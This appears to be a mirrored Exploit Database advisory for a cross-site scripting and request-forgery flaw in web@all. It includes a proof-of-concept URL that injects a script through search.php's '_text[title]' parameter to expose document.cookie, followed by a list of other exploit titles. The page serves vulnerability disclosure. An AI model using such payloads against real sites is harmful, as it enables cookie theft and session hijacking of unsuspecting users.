web@all – Cross-Site Scripting

Exploit Database
75 阅读

作者： High-Tech Bridge

日期： 2012-06-20
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/37435/

source: https://www.securityfocus.com/bid/54109/info

web@all is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.

An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete or modify sensitive information, or perform unauthorized actions. Other attacks are also possible. 

http://www.example.com/search.php?_text[title]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

last Exploits
web@all – Cross-Site Scripting的更多信息

Pithcms 0.9.5 – Local File Inclusion：
textpattern CMS 4.2.0 – Remote File Inclusion：
MyBB Game Section Plugin – ‘games.php’ Multiple Cross-Site Scripting Vulnerabilities：
Adive Framework 2.0.7 – Cross-Site Request Forgery：
Joomla! Component JoomBlog 1.3.1 – SQL Injection：
Sickbeard 0.1 – Cross-Site Request Forgery (Disable Authentication)：
Chartered Accountant Booking Script 1.0 – ‘city’ SQL Injection：
Joomla! Component SMEStorage – Local File Inclusion：